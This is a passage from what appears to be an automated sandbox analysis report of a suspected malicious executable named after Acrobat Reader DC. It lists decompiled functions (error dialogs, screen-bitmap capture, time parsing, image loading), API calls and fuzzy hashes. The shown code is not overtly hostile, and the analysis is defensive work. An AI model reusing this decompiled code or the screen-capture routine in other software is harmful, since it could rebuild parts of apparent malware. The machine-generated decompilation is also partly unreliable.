                                  • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: InfoItemMenu$Sleep_memset
                                  • String ID: 0
                                  • API String ID: 1504565804-4108050209
                                  • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                  • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                  • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                  • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E00460879(WCHAR* __edx, void* __fp0, intOrPtr _a4, int _a8, intOrPtr _a12) {
				WCHAR* _v24;
				intOrPtr _v28;
				void* _v44;
				char _v60;
				WCHAR* _v76;
				short _v8272;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				intOrPtr _t48;
				intOrPtr _t82;
				int _t83;
				int _t85;
				WCHAR* _t96;
				intOrPtr _t108;
				void* _t117;

				_t117 = __fp0;
				_t93 = __edx;
				_t38 = E00422240(0x2050);
				_t82 = _a4;
				_t112 = _t82;
				if(_t82 > 0) {
					_t85 =  *0x4a9130; // 0x66
					LoadStringW(GetModuleHandleW(0), _t85,  &_v8272, 0xfff);
					_t96 =  &_v8272;
					E00401B10(_t96,  &_v76, _t112);
					LoadStringW(GetModuleHandleW(0), _a8, _t96, 0xfff);
					E00401B10(_t96,  &_v60, _t112);
					_a4 = E004348DE(_t82);
					_t48 = E004348AA(_t82);
					_t106 = _t48;
					_v28 = _t48;
					_t83 = E00434908(E0043492F(_t82));
					_a8 = _t83;
					_t113 = _t83;
					if(_t83 != 0) {
						_push(_t83);
						_t93 =  &_v8272;
						E0041329B( &_v8272,  &_v8272, L"Line %d  (File \"%s\"):\n\n", _t106);
					} else {
						E0041329B(_t93, _t96, L"Line %d:\n\n", _t106);
					}
					E00401B10( &_v8272,  &_v24, _t113);
					_t108 = _a4;
					E0040D200( &_v24, _t85, _t108, _t117);
					E0040D200( &_v24, _t85, "\n", _t117);
					_t86 =  &_v44;
					E0040BC70( &_v44, _t113);
					_t100 = _a12;
					if(_a12 >= 0) {
						E00402160( &_v44, _t108, _t93, _t100);
						E0040C600( &_v44 | 0xffffffff,  &_v44, _t100);
						E0040D200( &_v44,  &_v44, L"^ ERROR", _t117);
						_t86 =  &_v44;
						E0040BD50( &_v24, _t117,  &_v44);
						E0040D200( &_v24,  &_v44, "\n", _t117);
						_t83 = _a8;
					}
					E0040D200( &_v24, _t86, L"\nError: ", _t117);
					E0040BD50( &_v24, _t117,  &_v60);
					_t116 =  *0x4a90eb;
					if( *0x4a90eb == 0) {
						MessageBoxW(0, _v24, _v76, 0x11010);
					} else {
						_push(_v44);
						_push(_t108);
						_push(_v60);
						_push(_v28);
						_push(_t83);
						_push(L"%s (%d) : ==> %s: \n%s \n%s\n");
						E00413ABE(_t83, _v28, L"\nError: ", _t108, _t116);
					}
					E00402250( &_v44);
					E00402250( &_v24);
					E00402250( &_v60);
					return E00402250( &_v76);
				}
				return _t38;
			}





















                                  0x00460879
                                  0x00460879
                                  0x00460881
                                  0x00460887
                                  0x0046088c
                                  0x0046088e
                                  0x00460894
                                  0x004608b0
                                  0x004608b6
                                  0x004608bf
                                  0x004608d7
                                  0x004608e0
                                  0x004608ec
                                  0x004608ef
                                  0x004608f4
                                  0x004608f7
                                  0x00460905
                                  0x00460907
                                  0x0046090a
                                  0x0046090c
                                  0x0046091f
                                  0x00460921
                                  0x0046092d
                                  0x0046090e
                                  0x00460915
                                  0x0046091a
                                  0x0046093e
                                  0x00460943
                                  0x0046094b
                                  0x00460958
                                  0x0046095d
                                  0x00460960
                                  0x00460965
                                  0x0046096a
                                  0x00460971
                                  0x0046097e
                                  0x0046098b
                                  0x00460990
                                  0x00460997
                                  0x004609a4
                                  0x004609a9
                                  0x004609a9
                                  0x004609b4
                                  0x004609c0
                                  0x004609c5
                                  0x004609cc
                                  0x004609fa
                                  0x004609ce
                                  0x004609d7
                                  0x004609d8
                                  0x004609d9
                                  0x004609da
                                  0x004609db
                                  0x004609dc
                                  0x004609e1
                                  0x004609e6
                                  0x00460a03
                                  0x00460a0b
                                  0x00460a13
                                  0x00000000
                                  0x00460a1b
                                  0x00460a26

                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                  • __swprintf.LIBCMT ref: 00460915
                                  • __swprintf.LIBCMT ref: 0046092D
                                  • _wprintf.LIBCMT ref: 004609E1
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                  • API String ID: 3631882475-2268648507
                                  • Opcode ID: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
                                  • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                  • Opcode Fuzzy Hash: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
                                  • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E004313CA(int _a4, int _a8, void* _a12, char _a15, intOrPtr* _a16) {
				char _v5;
				struct HBITMAP__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v52;
				struct HWND__* _v56;
				intOrPtr _v60;
				signed int _v64;
				int _v68;
				struct tagBITMAPINFO _v72;
				void* __edi;
				void* __esi;
				int _t60;
				intOrPtr _t64;
				void* _t71;
				int _t72;
				intOrPtr _t77;
				void* _t78;
				int _t79;
				int _t91;
				int _t94;
				intOrPtr _t96;
				int _t98;
				int _t105;
				intOrPtr _t108;
				int _t109;
				int _t114;
				struct HDC__* _t115;
				struct HDC__* _t116;
				int* _t119;
				int _t120;
				void* _t121;

				_t119 = _a12;
				_t60 = _t119[2];
				_t94 =  *_t119;
				_t105 = _t119[1];
				_t114 = _t119[3];
				_a15 = _t60 - _t94 < 0;
				_v5 = _t114 - _t105 < 0;
				if(_a15 != 0) {
					 *_t119 = _t60;
					_t119[2] = _t94;
				}
				if(_v5 != 0) {
					_t119[1] = _t114;
					_t119[3] = _t105;
				}
				E0043137E( *((intOrPtr*)(_a4 + 0x104)),  &_v28, _a8);
				_t64 = _v28;
				 *_t119 =  *_t119 + _t64;
				_t119[2] = _t119[2] + _t64;
				_t96 = _v24;
				_t119[3] = _t119[3] + _t96;
				_t119[1] = _t119[1] + _t96;
				_a8 = _t119[2] -  *_t119 + 1;
				_t91 = _t119[3] - _t119[1] + 1;
				_t115 = GetDC(0);
				_v16 = _t115;
				_v12 = CreateCompatibleBitmap(_t115, _a8, _t91);
				_t116 = CreateCompatibleDC(_t115);
				_t71 = SelectObject(_t116, _v12);
				_t108 = _v5;
				_v20 = _t71;
				_t98 = _t91;
				if(_t108 != 0) {
					_t98 =  ~_t98;
				}
				_t72 = _a8;
				if(_a15 != 0) {
					_t72 =  ~_t72;
				}
				if(_t108 == 0) {
					_t109 = _t119[1];
				} else {
					_t109 = _t119[3];
				}
				_t132 = _a15;
				_a4 = _t109;
				if(_a15 == 0) {
					_t120 =  *_t119;
				} else {
					_t120 = _t119[2];
				}
				StretchBlt(_t116, 0, 0, _a8, _t91, _v16, _t120, _a4, _t72, _t98, 0xcc0020);
				_t121 = _v12;
				_v64 =  ~_t91;
				_v72.bmiHeader = 0x28;
				_v68 = _a8;
				_v60 = 0x200001;
				_v56 = 0;
				GetDIBits(_t116, _t121, 0, 0, 0,  &_v72, 0);
				_t77 = _v52;
				_push(_t77);
				 *_a16 = _t77;
				_t78 = E004115D7(_t116, _t121, _t132);
				_a12 = _t78;
				_t79 = GetDIBits(_t116, _t121, 0, _t91, _t78,  &_v72, 0);
				SelectObject(_t116, _v20);
				DeleteObject(_t121);
				DeleteDC(_t116);
				ReleaseDC(0, _v16);
				if(_t79 == 0) {
					_push(_a12);
					E004111DC();
					__eflags = 0;
					return 0;
				} else {
					return _a12;
				}
			}





































                                  0x004313d2
                                  0x004313d5
                                  0x004313d8
                                  0x004313da
                                  0x004313e0
                                  0x004313e3
                                  0x004313e9
                                  0x004313f1
                                  0x004313f3
                                  0x004313f5
                                  0x004313f5
                                  0x004313fc
                                  0x004313fe
                                  0x00431401
                                  0x00431401
                                  0x00431416
                                  0x0043141b
                                  0x0043141e
                                  0x00431420
                                  0x00431423
                                  0x00431429
                                  0x00431431
                                  0x0043143a
                                  0x0043143d
                                  0x00431448
                                  0x0043144c
                                  0x00431456
                                  0x00431462
                                  0x00431466
                                  0x0043146c
                                  0x0043146f
                                  0x00431472
                                  0x00431476
                                  0x00431478
                                  0x00431478
                                  0x0043147e
                                  0x00431481
                                  0x00431483
                                  0x00431483
                                  0x00431487
                                  0x0043148e
                                  0x00431489
                                  0x00431489
                                  0x00431489
                                  0x00431491
                                  0x00431495
                                  0x00431498
                                  0x004314b0
                                  0x0043149a
                                  0x0043149a
                                  0x0043149a
                                  0x004314cc
                                  0x004314d2
                                  0x004314de
                                  0x004314ed
                                  0x004314f4
                                  0x004314f7
                                  0x004314fe
                                  0x00431505
                                  0x0043150b
                                  0x00431511
                                  0x00431512
                                  0x00431514
                                  0x00431528
                                  0x0043152b
                                  0x00431538
                                  0x0043153f
                                  0x00431546
                                  0x00431552
                                  0x0043155d
                                  0x004314a2
                                  0x004314a3
                                  0x004314a8
                                  0x004314ad
                                  0x00431563
                                  0x00431569
                                  0x00431569

                                  APIs
                                  • GetDC.USER32(00000000), ref: 0043143E
                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                  • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                  • SelectObject.GDI32(00000000,?), ref: 00431466
                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                  • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                  • String ID: (
                                  • API String ID: 3300687185-3887548279
                                  • Opcode ID: 606d77b4f1bde06d9a9935c8edd261f35aeb593e5eea415e727307547a522621
                                  • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                  • Opcode Fuzzy Hash: 606d77b4f1bde06d9a9935c8edd261f35aeb593e5eea415e727307547a522621
                                  • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00432A10(void* __ecx, short* _a4, struct _SYSTEMTIME* _a8, char _a12, signed int _a16) {
				short _v8;
				short _v12;
				char _v16;
				void* _t43;
				WORD _t48;
				WORD _t52;
				short _t60;
				void* _t61;
				WORD _t64;
				void* _t65;
				WORD _t68;
				void* _t69;
				signed int _t70;
				void* _t71;
				struct _SYSTEMTIME* _t85;
				short* _t86;
				void* _t87;
				void* _t89;
				void* _t90;

				_t70 = _a16;
				_t86 = _a4;
				_t85 = _a8;
				GetLocalTime(_t85);
				if( *_t86 == 0) {
					L12:
					return 0;
				} else {
					_t43 = E004111C1(_t86);
					_t90 = _t89 + 4;
					if(_t43 < 4) {
						goto L12;
					} else {
						if(_a12 != 0) {
							E00412FBA( &_v16, _t86, 4);
							_push( &_v16);
							_v8 = 0;
							_t60 = E00413190();
							_t86 = _t86 + 8 + _t70 * 2;
							_t85->wYear = _t60;
							_t61 = E004111C1(_t86);
							_t90 = _t90 + 0x14;
							if(_t61 >= 2) {
								E00412FBA( &_v16, _t86, 2);
								_push( &_v16);
								_v12 = 0;
								_t64 = E00413190();
								_t86 = _t86 + 4 + _t70 * 2;
								_t85->wMonth = _t64;
								_t65 = E004111C1(_t86);
								_t90 = _t90 + 0x14;
								if(_t65 >= 2) {
									E00412FBA( &_v16, _t86, 2);
									_push( &_v16);
									_v12 = 0;
									_t68 = E00413190();
									_t86 = _t86 + 4;
									_t85->wDay = _t68;
									_t69 = E004111C1(_t86);
									_t90 = _t90 + 0x14;
									if(_t69 != 0) {
										_t86 = _t86 + _t70 * 2;
									}
								}
							}
						}
						if(E004111C1(_t86) >= 2) {
							E00412FBA( &_v16, _t86, 2);
							_push( &_v16);
							_v12 = 0;
							_t48 = E00413190();
							_t87 = _t86 + 4 + _t70 * 2;
							_t85->wHour = _t48;
							_t71 = _t70 + _t70 + 4;
							if(E004111C1(_t87) >= 2) {
								E00412FBA( &_v16, _t87, 2);
								_push( &_v16);
								_v12 = 0;
								_t52 = E00413190();
								_t88 = _t87 + _t71;
								_t85->wMinute = _t52;
								if(E004111C1(_t87 + _t71) >= 2) {
									E00412FBA( &_v16, _t88, 2);
									_push( &_v16);
									_v12 = 0;
									_t85->wSecond = E00413190();
									_t85->wMilliseconds = 0;
								}
							}
						}
						return 1;
					}
				}
			}






















                                  0x00432a17
                                  0x00432a1b
                                  0x00432a1f
                                  0x00432a23
                                  0x00432a2d
                                  0x00432b8b
                                  0x00432b91
                                  0x00432a33
                                  0x00432a34
                                  0x00432a39
                                  0x00432a3f
                                  0x00000000
                                  0x00432a45
                                  0x00432a49
                                  0x00432a56
                                  0x00432a60
                                  0x00432a61
                                  0x00432a65
                                  0x00432a6a
                                  0x00432a6f
                                  0x00432a72
                                  0x00432a77
                                  0x00432a7d
                                  0x00432a86
                                  0x00432a90
                                  0x00432a91
                                  0x00432a95
                                  0x00432a9a
                                  0x00432a9f
                                  0x00432aa3
                                  0x00432aa8
                                  0x00432aae
                                  0x00432ab7
                                  0x00432ac1
                                  0x00432ac2
                                  0x00432ac6
                                  0x00432acb
                                  0x00432acf
                                  0x00432ad3
                                  0x00432ad8
                                  0x00432add
                                  0x00432adf
                                  0x00432adf
                                  0x00432add
                                  0x00432aae
                                  0x00432a7d
                                  0x00432aee
                                  0x00432afb
                                  0x00432b05
                                  0x00432b06
                                  0x00432b0a
                                  0x00432b0f
                                  0x00432b14
                                  0x00432b18
                                  0x00432b27
                                  0x00432b30
                                  0x00432b3a
                                  0x00432b3b
                                  0x00432b3f
                                  0x00432b44
                                  0x00432b47
                                  0x00432b56
                                  0x00432b5f
                                  0x00432b69
                                  0x00432b6a
                                  0x00432b76
                                  0x00432b7c
                                  0x00432b7c
                                  0x00432b56
                                  0x00432b27
                                  0x00432b88
                                  0x00432b88
                                  0x00432a3f

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                  • String ID:
                                  • API String ID: 461458858-0
                                  • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                  • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                  • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                  • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0043009D(struct HWND__** _a4, void* _a8, int* _a12, int* _a16) {
				int _v8;
				void* _v12;
				long _v16;
				int _v32;
				int _v36;
				void _v40;
				WCHAR* _t27;
				void* _t28;
				long _t29;
				intOrPtr* _t42;
				intOrPtr* _t46;
				int* _t50;
				int _t53;
				long _t57;
				int* _t63;
				void* _t76;
				struct HWND__** _t79;
				struct HWND__* _t80;
				void* _t82;

				_t27 = _a8;
				if( *_t27 == 0) {
					_a8 = 0;
					goto L10;
				} else {
					_t76 = CreateFileW(_t27, 0x80000000, 0, 0, 3, 0, 0);
					if(_t76 != 0xffffffff) {
						_t57 = GetFileSize(_t76, 0);
						_t82 = GlobalAlloc(2, _t57);
						if(_t82 == 0) {
							goto L2;
						} else {
							ReadFile(_t76, GlobalLock(_t82), _t57,  &_v16, 0);
							GlobalUnlock(_t82);
							CloseHandle(_t76);
							__imp__CreateStreamOnHGlobal(_t82, 1,  &_v12);
							_v8 = 0;
							__imp__#418(_v12, 0, 0, 0x4829f8,  &_v8);
							_t42 = _v12;
							 *((intOrPtr*)( *((intOrPtr*)( *_t42 + 8))))(_t42);
							GlobalFree(_t82);
							_t46 = _v8;
							if(_t46 == 0) {
								goto L2;
							} else {
								 *((intOrPtr*)( *((intOrPtr*)( *_t46 + 0xc))))(_t46,  &_a8);
								GetObjectW(_a8, 0x18,  &_v40);
								_t63 = _a12;
								_t50 = _a16;
								if( *_t63 == 0 &&  *_t50 == 0) {
									 *_t63 = _v36;
									 *_t50 = _v32;
								}
								_a8 = CopyImage(_a8, 0,  *_t63,  *_t50, 0x2000);
								_t53 = _v8;
								 *((intOrPtr*)( *((intOrPtr*)( *_t53 + 8))))(_t53);
								L10:
								_t79 = _a4;
								_t28 = _t79[0x18];
								if(_t28 != 0) {
									DeleteObject(_t28);
								}
								_t29 = _a8;
								_t79[0x18] = _t29;
								_t80 =  *_t79;
								SendMessageW(_t80, 0x172, 0, _t29);
								return _t80;
							}
						}
					} else {
						L2:
						return 0;
					}
				}
			}






















                                  0x004300a0
                                  0x004300ad
                                  0x004301be
                                  0x00000000
                                  0x004300b3
                                  0x004300c9
                                  0x004300ce
                                  0x004300e4
                                  0x004300ef
                                  0x004300f3
                                  0x00000000
                                  0x004300f5
                                  0x00430105
                                  0x0043010c
                                  0x00430113
                                  0x00430120
                                  0x00430137
                                  0x0043013e
                                  0x00430144
                                  0x0043014d
                                  0x00430150
                                  0x00430156
                                  0x0043015b
                                  0x00000000
                                  0x00430161
                                  0x0043016b
                                  0x00430177
                                  0x0043017d
                                  0x00430183
                                  0x00430186
                                  0x00430190
                                  0x00430195
                                  0x00430195
                                  0x004301ae
                                  0x004301b1
                                  0x004301ba
                                  0x004301c5
                                  0x004301c5
                                  0x004301c8
                                  0x004301cd
                                  0x004301d0
                                  0x004301d0
                                  0x004301d6
                                  0x004301dc
                                  0x004301df
                                  0x004301e7
                                  0x004301f5
                                  0x004301f5
                                  0x0043015b
                                  0x004300d0
                                  0x004300d0
                                  0x004300d8
                                  0x004300d8
                                  0x004300ce

                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                  • GlobalLock.KERNEL32 ref: 004300F6
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                  • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                  • CloseHandle.KERNEL32(00000000), ref: 00430113
                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                  • GlobalFree.KERNEL32 ref: 00430150
                                  • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                  • CopyImage.USER32 ref: 004301A8
                                  • DeleteObject.GDI32(?), ref: 004301D0
                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                  • String ID:
                                  • API String ID: 3969911579-0
                                  • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                  • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                  • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                  • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 51%
                                  			E00445BE4(void* __eflags, struct HWND__** _a4, intOrPtr* _a8) {
				short _v520;
				void* __edi;
				void* _t12;
				void* _t14;
				void* _t16;
				void* _t17;
				struct HWND__* _t23;
				intOrPtr* _t27;

				_t27 = _a8;
				_t23 = GetParent( *_a4);
				GetClassNameW(_t23,  &_v520, 0x100);
				if(E0041313C( &_v520, L"SHELLDLL_DefView") != 0) {
					return 0;
				} else {
					_t12 = E004114AB(_t23,  *_t27, L"largeicons");
					if(_t12 != 0) {
						_t14 = E004114AB(_t23,  *_t27, L"details");
						if(_t14 != 0) {
							_t16 = E004114AB(_t23,  *_t27, L"smallicons");
							if(_t16 != 0) {
								_t17 = E004114AB(_t23,  *_t27, L"list");
								if(_t17 == 0) {
									_push(_t17);
									_push(0x702b);
									goto L10;
								}
							} else {
								_push(_t16);
								_push(0x702a);
								goto L10;
							}
						} else {
							_push(_t14);
							_push(0x702c);
							goto L10;
						}
					} else {
						_push(_t12);
						_push(0x7029);
						L10:
						SendMessageW(_t23, 0x111, ??, ??);
					}
					return 1;
				}
			}











                                  0x00445bf3
                                  0x00445c09
                                  0x00445c0d
                                  0x00445c29
                                  0x00445c86
                                  0x00445c2b
                                  0x00445c33
                                  0x00445c3d
                                  0x00445c4f
                                  0x00445c59
                                  0x00445c6b
                                  0x00445c75
                                  0x00445c91
                                  0x00445c9b
                                  0x00445c9d
                                  0x00445c9e
                                  0x00000000
                                  0x00445c9e
                                  0x00445c77
                                  0x00445c77
                                  0x00445c78
                                  0x00000000
                                  0x00445c78
                                  0x00445c5b
                                  0x00445c5b
                                  0x00445c5c
                                  0x00000000
                                  0x00445c5c
                                  0x00445c3f
                                  0x00445c3f
                                  0x00445c40
                                  0x00445ca3
                                  0x00445ca9
                                  0x00445ca9
                                  0x00445cb6
                                  0x00445cb6

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$ClassMessageNameParentSend
